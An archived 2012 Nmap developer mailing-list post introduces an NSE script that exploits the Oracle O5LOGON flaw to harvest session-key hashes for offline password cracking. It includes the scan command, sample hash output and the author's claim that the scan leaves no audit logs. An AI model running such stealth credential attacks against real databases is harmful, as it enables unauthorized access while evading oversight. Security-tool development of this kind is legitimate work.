Nmap Development mailing list archives
Re: Script suggestion - oracle
From: Dhiru Kholia <dhiru.kholia () gmail com>
Date: Sat, 6 Oct 2012 16:06:48 +0530
On Sat, Oct 6, 2012 at 1:11 PM, Dhiru Kholia <dhiru.kholia () gmail com> wrote:
On Sat, Sep 29, 2012 at 10:40 PM, David Fifield <david () bamsoftware com> wrote:On Fri, Sep 28, 2012 at 10:59:14AM +0200, Martin Holst Swende wrote:I took a look at this http://marcel.vandewaters.nl/oracle/security/cryptographic-flaws-in-oracle-database-authentication-protocol Then checked tns.lua. Patrik has implemented TNS far enough it seems, there is implementation support for enumerating users and getting the salt (auth["AUTH_VFR_DATA"] ) and session key. As I interpret the info given above and in the comments on http://threatpost.com/en_us/blogs/flaw-oracle-logon-protocol-leads-easy-password-cracking-092012?utm_source=Threatpost&utm_medium=Tabs&utm_campaign=Today%27s+Most+Popular ), it seems like the session key is encrypted with SHA1(salt+pw), and it is possible to determine whether the decryption is correct or not, and thereby determine what the password is. More info about this will probably be released soon, would be solid script to add to NSE. Since enumeration is already implemented, a script could just get all users and their passwords in one go. That's pretty awesome.I made a script ideas entry for it. https://secwiki.org/w/Nmap/Script_Ideas#oracle-dump-hashes oracle-dump-hashes might not be the best name. I was thinking the script could just dump the keys or hashes or whatever, and an offline tool (or postrule script) could crack them.I have written a NSE script for doing stealth attack against O5LOGON protocol. This allows us to brute-force the session key(s) offline. I have verified that using this script generates no alerts or logs on the Oracle server. Result of "select os_username, username, userhost, action_name, returncode from dba_audit_session where action_name = 'LOGON' and username = 'SYS' and returncode > 0 order by timestamp;" query is constant when this script is used. ✗ cat ~/passdb wrongpassword ✗ ./nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL,userdb=/home/user/userdb,passdb=/home/user/passdb 192.168.2.253 --datadir . Starting Nmap 6.02 ( http://nmap.org ) at 2012-10-06 13:03 IST sys:$o5logon$E72DE5DA9067B874D759B3FDAA5FE5D64FA290E397026DF60A5B9BBD02A753CC39084572351F269886BE5EC746D9ECFC*5B624C20405D6C0FCCC3 sys:$o5logon$93DE103E471448653275625487FA6DEADD1BE91F199D4CAA1780658E1B3606FE1F9B57BA8A0CA9E451629A039ABB1DE2*5B624C20405D6C0FCCC3 Nmap scan report for 192.168.2.253 Host is up (0.00033s latency). PORT STATE SERVICE 1521/tcp open oracle | oracle-brute-stealth: | Accounts | No valid accounts found | Statistics |_ Performed 2 guesses in 1 seconds, average tps: 2 Nmap done: 1 IP address (1 host up) scanned in 0.48 seconds
With the latest patch (attached) output is improved, ✗ ./nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL,userdb=/home/user/userdb,passdb=/home/user/passdb 192.168.2.253 Starting Nmap 6.02 ( http://nmap.org ) at 2012-10-06 16:03 IST Nmap scan report for 192.168.2.253 Host is up (0.00027s latency). PORT STATE SERVICE 1521/tcp open oracle | oracle-brute-stealth: | Accounts | sys:$o5logon$022BE241D8412D17171EB9740F3E2EF8087D39AEAEA547721A3860148EE28420B37F329CE80E9B62A4E9586A2BF1715F*5B624C20405D6C0FCCC3 - Hashed valid or invalid credentials | test:$o5logon$3DD61959DB37F02CE0F60F64FE0DCBEB27FD2F357E7F4E5789F37999399FD0562D4126F360FF58DF349142B2F2ABA36E*72C21891D052649660F2 - Hashed valid or invalid credentials | Statistics |_ Performed 4 guesses in 1 seconds, average tps: 4 Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds -- Cheers, Dhiru
Attachment:
0001-Oracle-O5LOGON-stealth-attack-v2.patch.gz
Description:
_______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
Current thread:
- Re: Script suggestion - oracle Martin Holst Swende (Oct 04)
- Re: Script suggestion - oracle David Fifield (Oct 04)
- Re: Script suggestion - oracle Dhiru Kholia (Oct 04)
- Re: Script suggestion - oracle Richard Miles (Oct 04)
- Re: Script suggestion - oracle Dhiru Kholia (Oct 04)
- <Possible follow-ups>
- Re: Script suggestion - oracle Dhiru Kholia (Oct 06)
- Re: Script suggestion - oracle Dhiru Kholia (Oct 06)
- Re: Script suggestion - oracle Patrik Karlsson (Oct 06)
- Re: Script suggestion - oracle Richard Miles (Oct 10)
- Re: Script suggestion - oracle Abuse 007 (Oct 10)
- Re: Script suggestion - oracle Dhiru Kholia (Oct 06)
- Re: Script suggestion - oracle Richard Miles (Oct 10)
- Re: Script suggestion - oracle David Fifield (Oct 04)
- Re: Script suggestion - oracle Richard Miles (Oct 10)